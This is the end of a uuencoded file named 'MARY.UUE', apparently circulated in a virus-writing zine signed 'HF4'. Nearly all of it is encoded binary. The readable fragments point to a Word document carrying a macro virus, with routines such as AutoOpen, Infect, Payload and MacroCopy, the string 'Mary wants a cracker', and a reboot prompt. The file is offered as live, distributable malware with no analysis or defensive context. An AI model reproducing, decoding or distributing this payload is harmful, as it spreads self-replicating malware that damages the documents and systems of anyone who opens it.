M.31@#0I.=6U@`>`I*`!2;F0H*2`J(-(HP0,M(``&*4!PP0!S1);@:R0HX`5`
M=J*J3`!4<FEM)"A!)(L``F`X0N%036ED(0*_0*)``.`"`CB&`H!$,8`"JD0J
M!3,C!46*`C2#`J?`"@`L(@LB,82X1@$%K")!P)Y&`S)*`T))`ZHS2@-#20,T
M2@-$20.J-4H#14D#-DH#1DD#JC=*`T=)`SA*`TA)`ZHY2@-)20,P2@-*0`/W
M`R*B*@8B1P(B9`I#`P4B_T,#9`I#`P4B0P-A"L`H0P-[!2)#`TLC$4,#!2)#
M`TQW20,%(D,#34D#!2)#`TYW20,%(D,#3TD#!1&C`5#WJ0$%$:,!4:`!`Q$2
M)081_D@9(J,!!1&C`10BHP$%$?^C`10BHP$%$:,!%"*C`041_Z,!%"*C`041
MHP$4(J,!!1'_HP$4(J,!!1&C`=0<HP$%$?^C`=0<HP$%$:,!%R+2-`81>DH"
M$5*3%*,!!1&C`5-WJ0$%$:,!5*D!!1&C`55WJ0$%$:,!5JD!!1&C`5=WJ0$%
M$:,!6*D!!1&C`5GWJ0$%$:,!6JD!!1&C`10B=R%14$Z00RO@C%!-X!(K'"!*
MX'%K5%-\075T(&]/<&5N$6A);L!F96-T#0J"IV``0&%Y;&]A9*I_4Y]QJ7,!
M$0.?AIV&,C>!A!N7A@"D+N%C$`HB0V$(;F-ET8LN4F5M6&]V92V'8JM-0(AH
M@"A.;W<H*2E``T=P:L"MD@%$87EW`3(#A0&LH',@<')O=4!D;'D@;6&@CV+`
M>2!,;W)Z0!3!$!^U974`T`W5C7$10VQO#'-E80X+N'!H:6Q+``C+$D$@?79E
ME9\N!_&R&!1%"5-Y<W1E2&T@59&X8FP`#U``;&5A<V4@<F4`8F]O="!Y;W6@
M(&-O;7!@P7(A"@!X:717:6YD;U!W<T5X,9IF!``-_@HQ"'"O00Q("P,<$0MB
M>O]RI+)ZMY#U'N`%/P+4IO(?WP\"2P3"$4\"1P)08R(O`O\G`N(C8@A0`I$7
MP@I0'E,/?](`8'H1LG@+3P+PSW`N(GXZ00)U"5\"50):!\<`(!]V*94+\"A`
MKE``4VAO"G=0"3"@`$1I<V,X<FEP\IL0VS"C+D[L97?!!@`"(F(,3!D7!C^O
M)*,D]`;0OV7,X#!R>3`L(%-T$,RTWV%T`"!#4SHQ,#`P`3`'+"!?#0HB3<5B
M`B!PV6]C81()8N('0`B5/&TB````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M`````````18!``"V`/__`0$`````_____P````#_______\`````````````
M````````````````````````````````````````````````````````$```
M``,````%````!P```/__________`0$(````_____W@```#>````IP4``*4!
M``#_____``````$```!V37)-``#__P,``````````@``````````````````
M````````````````````````__\``,,%``#6````U@```/L:`````/____\`
M````WP#__P```````/__________________________________________
M____________________________________________________________
M____________________________________________________________
M________*````````CP$`/__``````(\"`#__P`````"/`P`__\``````CS_
M____``#__P$!````````````````WP````"X`````0&``P``'0```"0````"
M@QH"_____P@`__\P``````#_______\`````__________\`````'0```"0`
M```+$AP">````````&``````__________\`````_____WS_``#_________
M____```8`!@```"$```!````````"Q(H`O@````!``!@`````/__________
M`````/____\`````_____________P$`#@`/````A````0``2````/____\(
M````.````/____\"@QH"_____P@`__\```````#_______\`````________
M__\`````_____P@!```+$BH".`$``/____\`````__________\`````____
M_P````#_______________\-``````"$```````%````"Q(F`G@!``#_____
M`````/__________`````/____\`````_____PP`________#```````C```
M````(B(B(AL2-@(X`@``_____P````#__________P````#_____`````+@!
M```(`/_______SL``````(P$`````"(B,A)9@Z8`__________\(`?__````
M`-@!``"``0``,S,S,EF#.`+__________P@!__\`````^`$``(`!``#H`0``
M68,Z`O__________"`'__P`````8`@``@`$```````!9@SP"__________\(
M`?__`````/____^``0````````L2>@)X`@``_____P````#__________P``
M``#_____`````/_______________P8``````(0````````````+$GX"N`(`
M`/____\`````__________\`````_____P````#_______________\*````
M``"$````````````"Q*(`O@"``#_____`````/__________`````/____\`
M````________________"P``````A`````````````L2?`(X`P``_____P``
M``#__________P````#_____`````/_______________P\``````(0`````
M```````+$I8"__________\`````__________\`````_____P````#_____
M__________\'``````"$````````````_____V`````*``(`````````````
M`#@```#_____________________.`,``/__________________________
M_____\@```````````````@`!`#_____`````/______________________
M_________P0`_____TU%``#_______\`````__\`````__\!`0``````````
M````````````````````````````````````````````````````````````
M``````````````#^R@$`JP`B@0@`!@`"````````@0@`!``%`!``````@0@`
M"@```!@`````@0@`%````"@`````@0@`#````$``````@0@(!@```%``````
M@0@(!@```%@`````@0@(#@```&``````@0@``@```'``````@0@(!````'@`
M````@0@``@```(``````@`D!`````/____\`@`@`!````(@`````@0@`"@``
M`)``````@0@`#````*``````@0@(!````+``````@0@``@```+@`````@0@(
M#````,``````@0@``@```-``````@`D!`````/____\`@`@`!````-@`````
M@0@`)````!@"```$@0@``@````@!````@`D!`````/____\B@0@`!@```!`!
M````@0@`&@```!@!````@0@`&@```#@!````@`D!`````/____\`@0@`#@``
M`%@!````@`D!`````/____\`@0@`&````&@!````@0@`&````(`!````@0@`
M'````)@!````@0@`'````+@!````@0@`,@```-@!```$@0@``@````@`````
M@`D``````/____\`@`D``````/____\B@0@`!@```.``````@0@`&@```.@`
M````@0@`&@```$`"````@`D!`````/____\`@0@`#@```&`"````@`D!````
M`/____\`@0@`%@```'`"````@0@`&````(@"````@0@`'````*`"````@0@`
M'````,`"````@0@`,@```.`"```$@0@``@```!@#````@`D!`````/____]"
M@0@`!@```"`#````@0@`'````"@#````@0@("````$@#````@0@($@```%`#
M````@0@0&````&@#````@0@0%@```(`#````@0@8"````)@#````@0@0`@``
M`*`#````@0@("@```*@#````@0@``@```+@#```$@0@``@```,`#````@`D!
M`````/____]"@0@`!@```,@#````@0@`"````-`#````@0@`"````-@#````
M@0@`(````.`#````@0@`#@`````$````@0@`#@```!`$````@`D!`````/__
M__\`@0@`%@```"`$````@0@`%@```#@$````@0@`%@```%`$````@0@`%@``
M`&@$````@`D!`````/____\`@0@`'````(`$````@0@`'````*`$````@0@`
M'````,`$````@0@`'````.`$````@0@`'``````%````@0@`'````"`%````
M@0@`'````$`%````@0@`'````&`%````@0@`'````(`%````@0@`'````*`%
M````@`D!`````/____\`@0@`'````,`%````@0@`'````.`%````@0@`'```
M```&````@0@`'````"`&````@0@`'````$`&````@0@`'````&`&````@0@`
M'````(`&````@0@`'````*`&````@0@`'````,`&````@0@`'````.`&````
M@`D!`````/____\`@0@`'``````'````@0@`'````"`'````@0@`'````$`'
M````@0@`'````&`'````@0@`'````(`'````@0@`'````*`'````@0@`'```
M`,`'````@0@`'````.`'````@0@`'``````(````@0@`'````"`(````@`D!
M`````/____\`@0@`'````$`(````@0@`'````&`(````@0@`'````(`(````
M@0@`'````*`(````@0@`'````,`(````@0@`'````.`(````@0@`'``````)
M````@0@`'````"`)````@0@`'````$`)````@0@`'````&`)````@`D!````
M`/____\`@0@`&@```(`)```$@0@``@```*`)````@`D``````/____\B@0@`
M!@```*@)````@0@`!@```+`)````@0@`!@```+@)````@0@`!@```,`)```$
M@0@``@```,@)````@`D``````/____\B@0@`!@```-`)````@0@`.````-@)
M````@`D``````/____\`@0@`%````!`*````@0@`%````"@*````@0@`*```
M`$`*````@0@``@```&@*````@0@``@```'`*```$@0@``@```'@*````@`D`
M`````/____\B@0@`!@```(`*````@0@`!````(@*````@0@`!@```)`*````
M@0@`!@```)@*````@0@`"@```*`*````@0@`!@```+`*````@0@`-@```+@*
M````@0@`#@```/`*````@`@`!``````+```$@0@``@````@+````@`D`````
M`/____\B@0@`!@```!`+````@0@`'@```!@+````@0@`&@```#@+````@0@`
M'@```%@+````@0@`'````'@+````@0@`(````)@+````@`D``````/____\`
M@`D``````/____\`@0@`&@```+@+````@0@`&@```-@+````@0@`'````/@+
M````@0@`.@```!@,````@`D``````/____\$@0@``@```%@,````@`D`````
M`/____\B@0@`!@```&`,````@0@`!````&@,````@0@`!@```'`,````@1``
M3@```'@,````@0@`!@```,@,````@`@`!````-`,```$@0@``@```-@,``#_
M____`0'H#```CP0X``````!L`/__<````,$`'@)H````)"`B`@``)R`@`@``
M`````"`@(`*N````!0"4`$8`DP`D`F<``````"``)@*D````!0"5``````!!
M0"@"`````$%`*@(`````I``!`*0``0!!0"P"`@```&$`__\(````DP`N`@``
M``!H`/__>````)L`'@)P````)"`B`@``)R`@`@```````"`@(`*N````!0"5
M``````"3`"0"2````&$`__]`````K@`!`"``04`P`@$``````&@`__\H````
MFP`D`B````"/!/@``````"`@I@`@(#@"("`Z`B`@/`(D(#8"!``G(#0",@("
M````;`#___````"/!'@``````"`@I@`@(#@"("`Z`B`@/`(D(#8"!``G(#0"
M````````(""F`"`@.`(@(#H"("`\`B0@-@($`"<@/@(````````@(#0"("`^
M`@L`)R!``@``K@`*`$UA<GE6:7)$;V,D($0"`0`G($(")"`B`@``K@`!`#H`
M"P`@($(""P`G($8"("!&`JX`!P!';&]B86PZ`"`@0`(+`$%`2`("``````"N
M``0`26YT;*X`!0!);F9O,@`@($`"04!*`@,``````#4`3@*D`$$`!0`U`%`"
MI``"``4`-0`(`2`@0`(%`#4`4@(U`%0"I`````4`04!,`@4`````````____
M_^@!``"N`!0`36%R>2!W86YT<R!A(&-R86-K97*D``@`%@!!0#("`@`Z7%!2
M(""F`"`@.`(@(#H"("`\`B0@-@($`"<@/@))0U)/4T\@(#0"("`^`@L`)R!`
M`E9"K@`'`%9I<DYA;64`)"!$`@$`)R!:`@H!)"`B`@``K@`!`#H`"P`@(%H"
M"P`G(%P"("!<`JX`!P!';&]B86PZ`"`@0`(+`$%`2`("``,%"0*N``0`26YT
M;*X`!0!);F9O,0`@($`"04!*`@,`<F%M(#4`3@*D`"``!0`U`%`"I``"``4`
M-0`(`2`@0`(%`#4`4@(U`%0"I`````4`04!,`@4`;W)D"@``;`#__Q`!``"/
M"#@!`````*X`!`!);G1LK@`%`$EN9F\Q`"0@8`("`"<@7@(`````I````"<`
M)@*D````)`!B`@$`I`````H`E0`"'0```$/W`"``9`+V`*0``0"D````)`!B
M`@$`BP`@`&0"I````"0@9@("`"`@7@(%`)4`*0.D``$`)P`F`F@`__^(````
M]P`@`&0"]@#``)D#`````&@`__]P````9@#__V@```"/"'@!`````*0`D00G
M`&@"I`!.)"<`:@(D`&X"```@`&H"(`!H`@P`'0`/`"``:`(+`!D`)P!L`B``
M;`(D('`"`0`G("`"```@("`")"!R`@$`)R`@`D``("`@`J0``0"D``$`)"#\
M``,`)R`8````("`@`J0``@"D``$`)"#\``,`)R!T`@``("`@`J0``P"D``$`
M)"#\``,`)R!V`@``("`@`J0`!`"D``$`)"#\``,`)R!X`@``("`8`*X``0`Q
M``4`E`!&`*X``0!!`"<@I@!G```````@(!@`K@`!`#(`!0"4`$8`K@`!`$(`
M)R"F`&<``````"`@&`"N``$`,P`%`)0`1@"N``$`0P`G(*8`9P``````("`8
M`*X``0`T``4`E`!&`*X``0!$`"<@I@!G```````@(!@`K@`!`#4`!0"4`$8`
MK@`!`$4`)R"F`&<``````"`@&`"N``$`-@`%`)0`1@"N``$`1@`G(*8`9P``
M````("`8`*X``0`W``4`E`!&`*X``0!'`"<@I@!G```````@(!@`K@`!`#@`
M!0"4`$8`K@`!`$@`)R"F`&<``````"`@&`"N``$`.0`%`)0`1@"N``$`20`G
M(*8`9P``````("`8`*X``0`P``4`E`!&`*X``0!*`"<@I@!G```````@('0"
MK@`!`#$`!0"4`$8`K@`!`$@`)R`X`F<``````"`@=`*N``$`,@`%`)0Y`",`
M0P`Z`%P`4`!2`$\`1P!2`$$`30`@`$8`20!,`$4`4P!<`$,`3P!-`$T`3P!.
M`"``1@!)`$P`10!3`%P`30!)`$,`4@!/`%,`3P!&`%0`(`!3`$@`00!2`$4`
M1`!<`%8`0@!!`%P`5@!"`$$`,P`S`#(`+@!$`$P`3``C`%8`:0!S`'4`80!L
M`"``0@!A`',`:0!C`"``1@!O`'(`(`!!`'``<`!L`&D`8P!A`'0`:0!O`&X`
M<P`````````````````0`2H`7`!'`'L`,``P`#``,@`P`#D`,``U`"T`,``P
M`#``,``M`#``,``P`#``+0!#`#``,``P`"T`,``P`#``,``P`#``,``P`#``
M,``T`#8`?0`C`#@`+@`P`",`-``P`#D`(P!#`#H`7`!0`'(`;P!G`'(`80!M
M`"``1@!I`&P`90!S`%P`30!I`&,`<@!O`',`;P!F`'0`(`!/`&8`9@!I`&,`
M90!<`$\`9@!F`&D`8P!E`%P`30!3`%<`3P!2`$0`.``N`$\`3`!"`",`30!I
M`&,`<@!O`',`;P!F`'0`(`!7`&\`<@!D`"``.``N`#``(`!/`&(`:@!E`&,`
M=``@`$P`:0!B`'(`80!R`'D`````````````````N``J`%P`1P![`#``,``P
M`#(`,``T`#,`,``M`#``,``P`#``+0`P`#``,``P`"T`0P`P`#``,``M`#``
M,``P`#``,``P`#``,``P`#``-``V`'T`(P`R`"X`,``C`#``(P!#`#H`7`!7
M`$D`3@!$`$\`5P!3`%P`4P!9`%,`5`!%`$T`7`!3`'0`9`!/`&P`90`R`"X`
M=`!L`&(`(P!/`$P`10`@`$$`=0!T`&\`;0!A`'0`:0!O`&X`````````````
M````X``J`%P`1P![`#,`-@`V`$0`0P`T`#(`,@`M`#<`.0`R`#$`+0`Q`#$`
M1``Q`"T`.0!#`#4`,P`M`#``,``P`#``,``Q`#,`-0`Q`#D`-0`W`'T`(P`R
M`"X`,``C`#``(P!#`#H`7`!7`$D`3@!$`$\`5P!3`%P`4P!9`%,`5`!%`$T`
M7`!-`%,`1@!O`'(`;0!S`"X`5`!7`$0`(P!-`&D`8P!R`&\`<P!O`&8`=``@
M`$8`;P!R`&T`<P`@`#(`+@`P`"``3P!B`&H`90!C`'0`(`!,`&D`8@!R`&$`
M<@!Y```````````````!`.0`*@!<`$<`>P`S`#8`-@!$`$,`-``R`#,`+0`W
M`#D`,@`Q`"T`,0`Q`$0`,0`M`#D`0P`U`#,`+0`P`#``,``P`#``,0`S`#4`
M,0`Y`#4`-P!]`",`,@`N`#``(P`P`",`0P`Z`%P`5P!)`$X`1`!/`%<`4P!<
M`%0`10!-`%``7`!6`$(`10!<`$T`4P!&`&\`<@!M`',`+@!%`%@`1``C`$T`
M:0!C`'(`;P!S`&\`9@!T`"``1@!O`'(`;0!S`"``,@`N`#``(`!/`&(`:@!E
M`&,`=``@`$P`:0!B`'(`80!R`'D```````````````$```#A+D4-C^`:$(4N
M`F",30NT```2`"H`7`!#`$X`;P!R`&T`80!L`!(`*@!<`$,`3@!O`'(`;0!A
M`&P`*QOG,`0`````````#`$J`%P`1P![`#(`1`!&`#@`1``P`#0`0P`M`#4`
M0@!&`$$`+0`Q`#``,0!"`"T`0@!$`$4`-0`M`#``,`!!`$$`,``P`#0`-`!$
M`$4`-0`R`'T`(P`R`"X`,``C`#``(P!#`#H`7`!0`%(`3P!'`%(`00!-`"``
M1@!)`$P`10!3`%P`30!)`$,`4@!/`%,`3P!&`%0`(`!/`$8`1@!)`$,`10!<
M`$\`1@!&`$D`0P!%`%P`30!3`$\`.0`W`"X`1`!,`$P`(P!-`&D`8P!R`&\`
M<P!O`&8`=``@`$\`9@!F`&D`8P!E`"``.``N`#``(`!/`&(`:@!E`&,`=``@
M`$P`:0!B`'(`80!R`'D``````````````````@`"``$``P`$`@``!@(!``@"
M```8`O_______P````#__P``N1;H,`X`____________________________
M____________________________________________________```!``$`
M````````````````````````=DT"`!@`5`!H`&D`<P!$`&\`8P!U`&T`90!N
M`'0`"@!A,S!E.#$T,V8``P`J1`$1`O__=$T``````````@```-(#``#__PX`
M30!O`&0`=0!L`&4`,0`*`&,S,&4X,38R8@`#`"I$`1H"__]R30```````!@"
M````^QH``/_______P$!.`(``/__________________________________
M____________________________________________________________
M____________________________________________________________
M____________________________________________________________
M____________________________________________________________
M____________________________________________________________
M____________________________________________________________
M____________________________________________________________
M____________________________________________________________
M____________________________________________________________
M______________________________________\8`@``_____P`"``#_____
M________________________________________________PWY<7:%$SQ&<
M60```3495_____\!````Q7Y<7:%$SQ&<60```3495_____\!````_____T@`
M``"```````!0`5(`_P!(+P````!2``$$1@0$5V]R9+5K$``#!%9"0??B$``%
M!%=I;C$VP7X0``4$5VEN,S('?Q```P1-86.SLA``"`10<F]J96-T,0H7$``&
M!'-T9&]L99-@$``'`$U31F]R;7-##Q``#`14:&ES1&]C=6UE;G0\GA``"8``
M`/\#!`!?179A;'5A=&48V1``!@!.;W)M86S?V!``!H0(`/\#!`!/9F9I8V45
M=1``!P10<F]J96-T+:X0``<$36]D=6QE,6(1$``%A`@`_P,$`%!O;&QYMJX0
M``2$"`#_`P0`1V]N92/6$``!@```_P,$`$%8$!``"(```/\#!`!&:6QE3F%M
M96K#$``&A`@`_P,$`$9I;FES:%B.$``*A`@`_P,$`%9);G-T86QL961F6Q``
M!(0(`/\#!`!2=6XQ;700``2$"`#_`P0`4G5N,FYT$``+@```_P,$`$9I;&53
M879E06QLEO<0``2```#_`P0`1&]N90J%$``&@```_P,!`$EN<V5R=-9R$``&
M`$US9T)O>)=2$``!@```_P,$`%AO$!```X0(`/\#!`!&=6XSD!```80(`/\#
M!`!'7A`0``&$"`#_`P0`2%\0$``!A`@`_P,$`$IA$!```8```/\#!`!9;!`0
M``&```#_`P0`6G$0$``"@```_P,$`%(QX%X0``Z```#_`P0`1V5T1&]C=6UE
M;G1687*CW1```H```/\#!`!#3]-<$``)@```_P,$`$UA8W)O0V]P>?9%$``0
M@```_P,$`%-E=%!R;V9I;&53=')I;F=:5A``%H```/\#!`!4;V]L<T-U<W1O
M;6EZ94ME>6)O87)DLM`0``>```#_`P$`2V5Y0V]D9>V8$``(@```_P,!`$-A
M=&5G;W)YM%P0``,`061D]W(0``>```#_`P$`0V]N=&5X=%AN$``(!$1O8W5M
M96YT:M,0``^```#_`P0`7T)?<W1R7T9I;&5.86UE$5P0``*```#_`P0`4C+A
M7A```H```/\#!`!/0X->$``"@```_P,$`$-#QUP0`!"```#_`P0`1V5T4')O
M9FEL95-T<FEN9PA7$``+@```_P,$`$-O=6YT36%C<F]SA_80``&```#_`P0`
M:6`0$``)@```_P,$`$UA8W)O3F%M92!Y$``#@```_P,$`$]N94B_$``#@```
M_P,$`%1W;S?;$``#@```_P,$`$YU;?JZ$``#`%)N9%+/$``#`%-T<I?5$``%
M`$Q4<FEM]&(0``&```#_`P0`0UH0$``!@```_P,$`$1;$!```8```/\#!`!%
M7!`0``B$"`#_`P0`075T;T]P96[9*A``!H0(`/\#!`!);F9E8W3H9A``!X0(
M`/\#!`!087EL;V%DQ&<0``8`4F5M;W9ES[$0``4`36]N=&B;!!```P!.;W<E
MNA```P!$87FD@A``"80(`/\#!`!!=71O0VQO<V6DUA``!(0(`/\#!`!P:&EL
M#J,0``Z```#_`P$`06-T:79E1&]C=6UE;G337!``!(```/\#`0!3879EDM`0
M``V```#_`P0`17AI=%=I;F1O=W-%>$Z:$``(@```_P,$`&9F9F9F9F9FC?(0
M``J```#_`P0`5VEN9&]W3F%M9<R.$``*A`@`_P,$`%1O;VQS36%C<F]U\Q``
M`X```/\#`0!2=6Y?T!``!(```/\#`0!3:&]W#_40``N```#_`P0`1&ES8W)I
M<'1I;VX6!Q``!X```/\#!`!.97=.86UE(Q<0``*```#_`P0`4W4I7Q```O__
M`0%L````________________________________``(!`/__`@(``/______
M____________________________#`("`/__#@(#`/__$0(```P`________
M%`($`/__%@(%`/__&`+_____&P(!``P`$0`2`````0`D````````````````
M````````````````````````````````````````````````````````````
M`````````````````````````````````````````:FR@`$`!`````$`,"H"
M`I`)`'`4!D@#`(("`&3D!`0`!P`<`%!R;VIE8W0%40`H``!``A0&`A0]K0(*
M!P)L`10(!A()`A*`N1;H,`X`#`)*$CP""A8``7)S=&00;VQE/@(9<P!T``!D
M`&\`;`!E4``-`&8`)5P``RH`7$=[,#`P,C"P-#,P+0`(!`1#``H#`@X!$C`P
M-#9](P`R+C`C,"-#.@!<5TE.1$]74P!<4UE35$5-7`!3=&1/;&4R+@!T9`!I
M`'(`````````````````````````````````````````````````````````
M``````````````````````@``@'_______________\`````````````````
M``````````````````````````````!5````K0(```````!?`%\`4P!2`%``
M7P`P````````````````````````````````````````````````````````
A````````````$``"`/_______________P``````````
`
end
 
 ÄÄ MARY.UUE ENDS HERE ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 
 
 
                                   
                               -=<{[* HF4 *]}>=-
